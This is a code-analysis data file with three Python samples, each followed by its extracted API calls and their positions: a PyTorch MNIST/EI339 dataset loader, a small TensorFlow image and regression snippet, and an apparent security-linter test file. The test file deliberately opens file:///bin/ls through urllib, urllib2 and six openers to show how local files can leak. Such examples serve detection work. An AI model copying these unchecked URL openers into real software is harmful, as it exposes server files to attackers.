"EI339": {"raw": "",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"MNIST+EI339": {"raw": None,
"train": "training.pt",
"test": "test.pt"}, }
"""
~ root (CRT_ABS_PATH)
+ --- PATH_TO_DATASET
+ --- DATASET_MAPPING_FN
+ --- DATASET_SPLITS
"""
def __ei339_generate_raw_mappings__() -> \
typing.Tuple[typing.Tuple[np.ndarray, np.ndarray],
typing.Tuple[np.ndarray, np.ndarray]]:
abs_train_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["data"])
abs_train_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["label"])
abs_test_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["data"])
abs_test_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["label"])
if os.path.exists(path=abs_train_data_fn) and os.path.exists(path=abs_train_label_fn) \
and os.path.exists(path=abs_test_data_fn) and os.path.exists(path=abs_test_label_fn):
# print("Mappings Loaded from File")
return (np.load(abs_train_data_fn), np.load(abs_train_label_fn)), \
(np.load(abs_test_data_fn), np.load(abs_test_label_fn))
__ensure_path_validation__(abs_train_data_fn)
__ensure_path_validation__(abs_train_label_fn)
__ensure_path_validation__(abs_test_data_fn)
__ensure_path_validation__(abs_test_label_fn)
train_data_map, train_label_map = [], []
test_data_map, test_label_map = [], []
for label_num in tqdm(range(1, 10 + 1)):
# print("Mapping Images of Label %d" % label_num)
abs_path_to_file_folder = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"],
DATASET_SPLITS["EI339"]["raw"], str(label_num))
abs_path_to_tr_files = os.path.join(abs_path_to_file_folder, "training/")
path_to_test_files = os.path.join(abs_path_to_file_folder, "testing/")
save_label_num = 0 if 10 == label_num else label_num
save_label_num += 10
# Training Data
for file in os.listdir(abs_path_to_tr_files):
abs_path_to_tr_file = os.path.join(abs_path_to_tr_files, file)
train_data_map.append(abs_path_to_tr_file)
train_label_map.append(save_label_num)
# Test Data
for file in os.listdir(path_to_test_files):
abs_path_to_test_file = os.path.join(path_to_test_files, file)
test_data_map.append(abs_path_to_test_file)
test_label_map.append(save_label_num)
train_data_map = np.array(train_data_map) # (cnt,) <str> as <U129>
train_label_map = np.array(train_label_map) # (cnt,) <np.int32>
train_idx = np.arange(train_label_map.size)
np.random.shuffle(train_idx)
train_data_map = train_data_map[train_idx]
train_label_map = train_label_map[train_idx]
print("EI339: Train Data Mapping Shuffled")
test_data_map = np.array(test_data_map) # (cnt,) <str> as <U129>
test_label_map = np.array(test_label_map) # (cnt,) <int>
test_idx = np.arange(test_label_map.size)
np.random.shuffle(test_idx)
test_data_map = test_data_map[test_idx]
test_label_map = test_label_map[test_idx]
print("EI339: Test Data Mapping Shuffled")
np.save(arr=train_data_map, file=abs_train_data_fn)
np.save(arr=train_label_map, file=abs_train_label_fn)
np.save(arr=test_data_map, file=abs_test_data_fn)
np.save(arr=test_label_map, file=abs_test_label_fn)
return (train_data_map, train_label_map), (test_data_map, test_label_map)
def __ei339_load_raw_image__(path: str) -> np.ndarray:
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, dsize=(28, 28))
# _, img = cv2.threshold(img, thresh=128, maxval=255, type=cv2.THRESH_BINARY)
img = 255 - img
return img
def __ensure_path_validation__(filename_with_path: str) -> None:
path = os.path.split(filename_with_path)[0]
if not os.path.exists(path):
os.mkdir(path)
assert os.path.exists(path), "[Error] Access to Directory \"%s\" is Denied" % path
def __ei339_process_raw_data__() -> None:
abs_train_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
abs_test_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
if os.path.exists(abs_train_dataset_path) and os.path.exists(abs_test_dataset_path):
return
__ensure_path_validation__(abs_train_dataset_path)
__ensure_path_validation__(abs_test_dataset_path)
(train_data_fn, train_label), (test_data_fn, test_label) = \
__ei339_generate_raw_mappings__()
# train data
train_data = []
for file in tqdm(train_data_fn):
train_data.append(__ei339_load_raw_image__(path=file))
train_data = np.array(train_data)
train_data = torch.from_numpy(train_data) # torch.Size([7385, 28, 28])
train_label = torch.from_numpy(train_label).long() # torch.Size([7385])
# print(train_data.shape, train_label.shape)
# test data
test_data = []
for file in tqdm(test_data_fn):
test_data.append(__ei339_load_raw_image__(path=file))
test_data = np.array(test_data)
test_data = torch.from_numpy(test_data) # torch.Size([2034, 28, 28])
test_label = torch.from_numpy(test_label).long() # torch.Size([2034])
# print(test_data.shape, test_label.shape)
torch.save((train_data, train_label), f=abs_train_dataset_path)
torch.save((test_data, test_label), f=abs_test_dataset_path)
print("EI339: Train & Test Data Saved")
def __combine_dataset__(data_fn_list: list, output_filename: str) -> None:
assert len(data_fn_list) > 1, "[Error] Given to-Combine List if of Length 1"
if os.path.exists(output_filename):
return
__ensure_path_validation__(output_filename)
for file in data_fn_list:
if not os.path.exists(file):
raise RuntimeError("[Error] File \"%s\" NOT Exist" % file)
data_list, targets_list = [], []
for file in data_fn_list:
_data, _target = torch.load(file)
data_list.append(_data)
targets_list.append(_target)
data = torch.cat(data_list, dim=0)
targets = torch.cat(targets_list, dim=0)
torch.save((data, targets), f=output_filename)
print("Dataset Combined")
for file in data_fn_list:
print("\tFrom \"%s\"" % file)
print("\tTo \"%s\"" % output_filename)
class TorchLocalDataLoader(Dataset):
def __init__(self, train: bool = True,
transform: torchvision.transforms.transforms.Compose = None,
mnist: bool = False, ei339: bool = False):
assert (mnist or ei339) is True, "[Error] No Dataset is Selected"
self.transform = transform
self.mnist_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"])
self.mnist_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["test"])
self.ei339_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
self.ei339_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
self.combined_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["train"])
self.combined_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["test"])
# initialize dataset: MNIST, EI339, combined
torchvision.datasets.MNIST(CRT_ABS_PATH, train=True, download=True)
torchvision.datasets.MNIST(CRT_ABS_PATH, train=False, download=True)
__ei339_process_raw_data__()
__combine_dataset__([self.mnist_train_path, self.ei339_train_path],
self.combined_train_path)
__combine_dataset__([self.mnist_test_path, self.ei339_test_path],
self.combined_test_path)
# get data from file, save to self.data, self.targets (type Tensor)
if mnist is True and ei339 is True:
data_file = self.combined_train_path if train else self.combined_test_path
self.data, self.targets = torch.load(data_file)
elif mnist is True:
data_file = self.mnist_train_path if train else self.mnist_test_path
self.data, self.targets = torch.load(data_file)
else: # ei339 is True
data_file = self.ei339_train_path if train else self.ei339_test_path
self.data, self.targets = torch.load(data_file)
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
img, target = self.data[idx], int(self.targets[idx])
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
return img, target
if "__main__" == __name__:
# # see MNIST processed file data structure
# # Tuple[Tensor(Size([60000, 28, 28])), Tensor(Size([60000]))]
# a = torch.load(os.path.join(PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"]))
# print(type(a))
# print(a[0].shape)
# print(type(a[0][0]))
# print(a[1].shape)
# print(type(a[1][0]))
# __ei339_process_raw_data__()
loader = TorchLocalDataLoader(
train=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize((0.1307,), (0.3081,)), ]),
mnist=True,
ei339=True
)
train_loader = DataLoader(dataset=loader, batch_size=30, shuffle=True)
|
[
"os.mkdir",
"numpy.load",
"torch.cat",
"numpy.arange",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.utils.data.DataLoader",
"torch.load",
"os.path.exists",
"torch.is_tensor",
"cv2.resize",
"numpy.random.shuffle",
"tqdm.tqdm",
"numpy.save",
"inspect.currentframe",
"torchvision.datasets.MNIST",
"os.listdir",
"torch.from_numpy",
"torch.save",
"cv2.imread",
"numpy.array",
"os.path.split",
"torchvision.transforms.ToTensor"
] |
[((1773, 1876), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['data'])\n", (1785, 1876), False, 'import os\n'), ((1906, 2010), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['label'])\n", (1918, 2010), False, 'import os\n'), ((2038, 2140), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['data'])\n", (2050, 2140), False, 'import os\n'), ((2169, 2272), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['label'])\n", (2181, 2272), False, 'import os\n'), ((3997, 4021), 'numpy.array', 'np.array', (['train_data_map'], {}), '(train_data_map)\n', (4005, 4021), True, 'import numpy as np\n'), ((4070, 4095), 'numpy.array', 'np.array', (['train_label_map'], {}), '(train_label_map)\n', (4078, 4095), True, 'import numpy as np\n'), ((4133, 4164), 'numpy.arange', 'np.arange', (['train_label_map.size'], {}), '(train_label_map.size)\n', (4142, 4164), True, 'import numpy as np\n'), ((4169, 4197), 'numpy.random.shuffle', 'np.random.shuffle', (['train_idx'], {}), '(train_idx)\n', (4186, 4197), True, 'import numpy as np\n'), ((4362, 4385), 'numpy.array', 'np.array', (['test_data_map'], {}), '(test_data_map)\n', (4370, 4385), True, 'import numpy as np\n'), ((4433, 4457), 'numpy.array', 'np.array', (['test_label_map'], {}), '(test_label_map)\n', (4441, 4457), True, 'import numpy as np\n'), ((4489, 4519), 'numpy.arange', 'np.arange', (['test_label_map.size'], {}), '(test_label_map.size)\n', (4498, 4519), True, 'import numpy as np\n'), ((4524, 4551), 'numpy.random.shuffle', 'np.random.shuffle', (['test_idx'], {}), '(test_idx)\n', (4541, 4551), True, 'import numpy as np\n'), ((4693, 4744), 'numpy.save', 'np.save', ([], {'arr': 'train_data_map', 'file': 'abs_train_data_fn'}), '(arr=train_data_map, file=abs_train_data_fn)\n', (4700, 4744), True, 'import numpy as np\n'), ((4749, 4802), 'numpy.save', 'np.save', ([], {'arr': 'train_label_map', 'file': 'abs_train_label_fn'}), '(arr=train_label_map, file=abs_train_label_fn)\n', (4756, 4802), True, 'import numpy as np\n'), ((4807, 4856), 'numpy.save', 'np.save', ([], {'arr': 'test_data_map', 'file': 'abs_test_data_fn'}), '(arr=test_data_map, file=abs_test_data_fn)\n', (4814, 4856), True, 'import numpy as np\n'), ((4861, 4912), 'numpy.save', 'np.save', ([], {'arr': 'test_label_map', 'file': 'abs_test_label_fn'}), '(arr=test_label_map, file=abs_test_label_fn)\n', (4868, 4912), True, 'import numpy as np\n'), ((5059, 5097), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_GRAYSCALE'], {}), '(path, cv2.IMREAD_GRAYSCALE)\n', (5069, 5097), False, 'import cv2\n'), ((5108, 5139), 'cv2.resize', 'cv2.resize', (['img'], {'dsize': '(28, 28)'}), '(img, dsize=(28, 28))\n', (5118, 5139), False, 'import cv2\n'), ((5439, 5459), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5453, 5459), False, 'import os\n'), ((5588, 5679), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (5600, 5679), False, 'import os\n'), ((5712, 5802), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (5724, 5802), False, 'import os\n'), ((6182, 6201), 'tqdm.tqdm', 'tqdm', (['train_data_fn'], {}), '(train_data_fn)\n', (6186, 6201), False, 'from tqdm import tqdm\n'), ((6283, 6303), 'numpy.array', 'np.array', (['train_data'], {}), '(train_data)\n', (6291, 6303), True, 'import numpy as np\n'), ((6321, 6349), 'torch.from_numpy', 'torch.from_numpy', (['train_data'], {}), '(train_data)\n', (6337, 6349), False, 'import torch\n'), ((6558, 6576), 'tqdm.tqdm', 'tqdm', (['test_data_fn'], {}), '(test_data_fn)\n', (6562, 6576), False, 'from tqdm import tqdm\n'), ((6656, 6675), 'numpy.array', 'np.array', (['test_data'], {}), '(test_data)\n', (6664, 6675), True, 'import numpy as np\n'), ((6692, 6719), 'torch.from_numpy', 'torch.from_numpy', (['test_data'], {}), '(test_data)\n', (6708, 6719), False, 'import torch\n'), ((6877, 6940), 'torch.save', 'torch.save', (['(train_data, train_label)'], {'f': 'abs_train_dataset_path'}), '((train_data, train_label), f=abs_train_dataset_path)\n', (6887, 6940), False, 'import torch\n'), ((6945, 7005), 'torch.save', 'torch.save', (['(test_data, test_label)'], {'f': 'abs_test_dataset_path'}), '((test_data, test_label), f=abs_test_dataset_path)\n', (6955, 7005), False, 'import torch\n'), ((7215, 7246), 'os.path.exists', 'os.path.exists', (['output_filename'], {}), '(output_filename)\n', (7229, 7246), False, 'import os\n'), ((7639, 7666), 'torch.cat', 'torch.cat', (['data_list'], {'dim': '(0)'}), '(data_list, dim=0)\n', (7648, 7666), False, 'import torch\n'), ((7681, 7711), 'torch.cat', 'torch.cat', (['targets_list'], {'dim': '(0)'}), '(targets_list, dim=0)\n', (7690, 7711), False, 'import torch\n'), ((7717, 7763), 'torch.save', 'torch.save', (['(data, targets)'], {'f': 'output_filename'}), '((data, targets), f=output_filename)\n', (7727, 7763), False, 'import torch\n'), ((11328, 11383), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'loader', 'batch_size': '(30)', 'shuffle': '(True)'}), '(dataset=loader, batch_size=30, shuffle=True)\n', (11338, 11383), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((2284, 2322), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_data_fn'}), '(path=abs_train_data_fn)\n', (2298, 2322), False, 'import os\n'), ((2327, 2366), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_label_fn'}), '(path=abs_train_label_fn)\n', (2341, 2366), False, 'import os\n'), ((2385, 2422), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_data_fn'}), '(path=abs_test_data_fn)\n', (2399, 2422), False, 'import os\n'), ((2427, 2465), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_label_fn'}), '(path=abs_test_label_fn)\n', (2441, 2465), False, 'import os\n'), ((3242, 3292), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""training/"""'], {}), "(abs_path_to_file_folder, 'training/')\n", (3254, 3292), False, 'import os\n'), ((3322, 3371), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""testing/"""'], {}), "(abs_path_to_file_folder, 'testing/')\n", (3334, 3371), False, 'import os\n'), ((3507, 3539), 'os.listdir', 'os.listdir', (['abs_path_to_tr_files'], {}), '(abs_path_to_tr_files)\n', (3517, 3539), False, 'import os\n'), ((3762, 3792), 'os.listdir', 'os.listdir', (['path_to_test_files'], {}), '(path_to_test_files)\n', (3772, 3792), False, 'import os\n'), ((5335, 5368), 'os.path.split', 'os.path.split', (['filename_with_path'], {}), '(filename_with_path)\n', (5348, 5368), False, 'import os\n'), ((5383, 5403), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5397, 5403), False, 'import os\n'), ((5413, 5427), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5421, 5427), False, 'import os\n'), ((5814, 5852), 'os.path.exists', 'os.path.exists', (['abs_train_dataset_path'], {}), '(abs_train_dataset_path)\n', (5828, 5852), False, 'import os\n'), ((5857, 5894), 'os.path.exists', 'os.path.exists', (['abs_test_dataset_path'], {}), '(abs_test_dataset_path)\n', (5871, 5894), False, 'import os\n'), ((7542, 7558), 'torch.load', 'torch.load', (['file'], {}), '(file)\n', (7552, 7558), False, 'import torch\n'), ((8267, 8358), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['train'])\n", (8279, 8358), False, 'import os\n'), ((8398, 8488), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['test'])\n", (8410, 8488), False, 'import os\n'), ((8529, 8620), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (8541, 8620), False, 'import os\n'), ((8660, 8750), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (8672, 8750), False, 'import os\n'), ((8794, 8897), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['train'])\n", (8806, 8897), False, 'import os\n'), ((8940, 9042), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['test'])\n", (8952, 9042), False, 'import os\n'), ((9113, 9180), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(True)', 'download': '(True)'}), '(CRT_ABS_PATH, train=True, download=True)\n', (9139, 9180), False, 'import torchvision\n'), ((9189, 9257), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(False)', 'download': '(True)'}), '(CRT_ABS_PATH, train=False, download=True)\n', (9215, 9257), False, 'import torchvision\n'), ((10262, 10282), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (10277, 10282), False, 'import torch\n'), ((290, 312), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (310, 312), False, 'import inspect\n'), ((3575, 3615), 'os.path.join', 'os.path.join', (['abs_path_to_tr_files', 'file'], {}), '(abs_path_to_tr_files, file)\n', (3587, 3615), False, 'import os\n'), ((3830, 3868), 'os.path.join', 'os.path.join', (['path_to_test_files', 'file'], {}), '(path_to_test_files, file)\n', (3842, 3868), False, 'import os\n'), ((6398, 6427), 'torch.from_numpy', 'torch.from_numpy', (['train_label'], {}), '(train_label)\n', (6414, 6427), False, 'import torch\n'), ((6767, 6795), 'torch.from_numpy', 'torch.from_numpy', (['test_label'], {}), '(test_label)\n', (6783, 6795), False, 'import torch\n'), ((7356, 7376), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (7370, 7376), False, 'import os\n'), ((9798, 9819), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9808, 9819), False, 'import torch\n'), ((2528, 2554), 'numpy.load', 'np.load', (['abs_train_data_fn'], {}), '(abs_train_data_fn)\n', (2535, 2554), True, 'import numpy as np\n'), ((2556, 2583), 'numpy.load', 'np.load', (['abs_train_label_fn'], {}), '(abs_train_label_fn)\n', (2563, 2583), True, 'import numpy as np\n'), ((2604, 2629), 'numpy.load', 'np.load', (['abs_test_data_fn'], {}), '(abs_test_data_fn)\n', (2611, 2629), True, 'import numpy as np\n'), ((2631, 2657), 'numpy.load', 'np.load', (['abs_test_label_fn'], {}), '(abs_test_label_fn)\n', (2638, 2657), True, 'import numpy as np\n'), ((9967, 9988), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9977, 9988), False, 'import torch\n'), ((10139, 10160), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (10149, 10160), False, 'import torch\n'), ((11157, 11190), 'torchvision.transforms.ToTensor', 'torchvision.transforms.ToTensor', ([], {}), '()\n', (11188, 11190), False, 'import torchvision\n'), ((11204, 11258), 'torchvision.transforms.Normalize', 'torchvision.transforms.Normalize', (['(0.1307,)', '(0.3081,)'], {}), '((0.1307,), (0.3081,))\n', (11236, 11258), False, 'import torchvision\n')]
|
# -*- coding utf-8 -*-
import cv2
import os
import numpy as np
from sklearn.model_selection import train_test_split
import random
import tensorflow as tf
def read_data(img_path, image_h = 64, image_w = 64):
image_data = []
label_data = []
image = cv2.imread(img_path)
#cv2.namedWindow("Image")
#cv2.imshow("Image",image)
#cv2.waitKey(0)
h,w,_ = image.shape
longest_edge = max(h,w)
top, bottom, left, right = (0, 0, 0, 0)
dh,dw = (0,0)
if h < longest_edge:
dh = longest_edge - h
top = dh // 2
bottom = dh - top
elif w < longest_edge:
dw = longest_edge - w
left = dw // 2
right = dw - left
else:
pass
image_pad = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=[0, 0, 0])
image = cv2.resize(image_pad, (image_h, image_w))
image_data.append(image)
label_data.append(img_path)
image_data = np.array(image_data)
train_x, test_x, train_y, test_y = train_test_split(image_data, label_data, test_size=0.05,
random_state=random.randint(0, 100))
X = tf.placeholder(tf.float32,[None, 64, 64, 3])
Y = tf.placeholder(tf.float32, [None, 2])
return Y
#img_path = '4833.jpg'
#print(read_data(img_path))
x_data = np.float32(np.random.rand(2,100))
y_data = np.dot([0.100, 0.200], x_data) + 0.300
b = tf.Variable(tf.zeros([1]), name='B')
W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='W')
y = tf.add(tf.matmul(W, x_data, name='MatMul'), b ,name='add')
loss = tf.reduce_mean(tf.square(tf.subtract(y, y_data, name='Sub'), name='Square'), name='ReduceMean')
optimizer = tf.train.GradientDescentOptimizer(0.001, name='Optimizer')
train = optimizer.minimize(loss, name='minimize')
summaries = [tf.summary.histogram('W',W), tf.summary.histogram('b', b), tf.summary.scalar('loss', loss)]
summary_op = tf.summary.merge(summaries)
print(summary_op)
|
[
"tensorflow.random_uniform",
"numpy.dot",
"tensorflow.summary.scalar",
"tensorflow.subtract",
"random.randint",
"cv2.copyMakeBorder",
"cv2.imread",
"tensorflow.placeholder",
"tensorflow.zeros",
"numpy.array",
"tensorflow.matmul",
"tensorflow.summary.histogram",
"numpy.random.rand",
"tensorflow.train.GradientDescentOptimizer",
"tensorflow.summary.merge",
"cv2.resize"
] |
[((1750, 1808), 'tensorflow.train.GradientDescentOptimizer', 'tf.train.GradientDescentOptimizer', (['(0.001)'], {'name': '"""Optimizer"""'}), "(0.001, name='Optimizer')\n", (1783, 1808), True, 'import tensorflow as tf\n'), ((1982, 2009), 'tensorflow.summary.merge', 'tf.summary.merge', (['summaries'], {}), '(summaries)\n', (1998, 2009), True, 'import tensorflow as tf\n'), ((271, 291), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (281, 291), False, 'import cv2\n'), ((753, 846), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['image', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': '[0, 0, 0]'}), '(image, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=[0, 0, 0])\n', (771, 846), False, 'import cv2\n'), ((856, 897), 'cv2.resize', 'cv2.resize', (['image_pad', '(image_h, image_w)'], {}), '(image_pad, (image_h, image_w))\n', (866, 897), False, 'import cv2\n'), ((981, 1001), 'numpy.array', 'np.array', (['image_data'], {}), '(image_data)\n', (989, 1001), True, 'import numpy as np\n'), ((1202, 1247), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 64, 64, 3]'], {}), '(tf.float32, [None, 64, 64, 3])\n', (1216, 1247), True, 'import tensorflow as tf\n'), ((1256, 1293), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 2]'], {}), '(tf.float32, [None, 2])\n', (1270, 1293), True, 'import tensorflow as tf\n'), ((1386, 1408), 'numpy.random.rand', 'np.random.rand', (['(2)', '(100)'], {}), '(2, 100)\n', (1400, 1408), True, 'import numpy as np\n'), ((1419, 1445), 'numpy.dot', 'np.dot', (['[0.1, 0.2]', 'x_data'], {}), '([0.1, 0.2], x_data)\n', (1425, 1445), True, 'import numpy as np\n'), ((1477, 1490), 'tensorflow.zeros', 'tf.zeros', (['[1]'], {}), '([1])\n', (1485, 1490), True, 'import tensorflow as tf\n'), ((1519, 1555), 'tensorflow.random_uniform', 'tf.random_uniform', (['[1, 2]', '(-1.0)', '(1.0)'], {}), '([1, 2], -1.0, 1.0)\n', (1536, 1555), True, 'import tensorflow as tf\n'), ((1579, 1614), 'tensorflow.matmul', 'tf.matmul', (['W', 'x_data'], {'name': '"""MatMul"""'}), "(W, x_data, name='MatMul')\n", (1588, 1614), True, 'import tensorflow as tf\n'), ((1876, 1904), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""W"""', 'W'], {}), "('W', W)\n", (1896, 1904), True, 'import tensorflow as tf\n'), ((1905, 1933), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""b"""', 'b'], {}), "('b', b)\n", (1925, 1933), True, 'import tensorflow as tf\n'), ((1935, 1966), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (1952, 1966), True, 'import tensorflow as tf\n'), ((1666, 1700), 'tensorflow.subtract', 'tf.subtract', (['y', 'y_data'], {'name': '"""Sub"""'}), "(y, y_data, name='Sub')\n", (1677, 1700), True, 'import tensorflow as tf\n'), ((1169, 1191), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (1183, 1191), False, 'import random\n')]
|
''' Example dangerous usage of urllib[2] opener functions
The urllib and urllib2 opener functions and object can open http, ftp,
and file urls. Often, the ability to open file urls is overlooked leading
to code that can unexpectedly open files on the local server. This
could be used by an attacker to leak information about the server.
'''
import urllib
import urllib2
# Python 3
import urllib.request
# Six
import six
def test_urlopen():
# urllib
url = urllib.quote('file:///bin/ls')
urllib.urlopen(url, 'blah', 32)
urllib.urlretrieve('file:///bin/ls', '/bin/ls2')
opener = urllib.URLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
opener = urllib.FancyURLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
# urllib2
handler = urllib2.HTTPBasicAuthHandler()
handler.add_password(realm='test',
uri='http://mysite.com',
user='bob')
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
urllib2.urlopen('file:///bin/ls')
urllib2.Request('file:///bin/ls')
# Python 3
urllib.request.urlopen('file:///bin/ls')
urllib.request.urlretrieve('file:///bin/ls', '/bin/ls2')
opener = urllib.request.URLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
opener = urllib.request.FancyURLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
# Six
six.moves.urllib.request.urlopen('file:///bin/ls')
six.moves.urllib.request.urlretrieve('file:///bin/ls', '/bin/ls2')
opener = six.moves.urllib.request.URLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
opener = six.moves.urllib.request.FancyURLopener()
opener.open('file:///bin/ls')
opener.retrieve('file:///bin/ls')
|
[
"urllib2.HTTPBasicAuthHandler",
"urllib2.install_opener",
"urllib.quote",
"urllib.FancyURLopener",
"urllib2.Request",
"urllib.request.FancyURLopener",
"urllib.urlopen",
"urllib.request.urlopen",
"urllib.request.URLopener",
"urllib.request.urlretrieve",
"six.moves.urllib.request.urlopen",
"urllib.URLopener",
"six.moves.urllib.request.urlretrieve",
"urllib.urlretrieve",
"six.moves.urllib.request.URLopener",
"six.moves.urllib.request.FancyURLopener",
"urllib2.urlopen",
"urllib2.build_opener"
] |
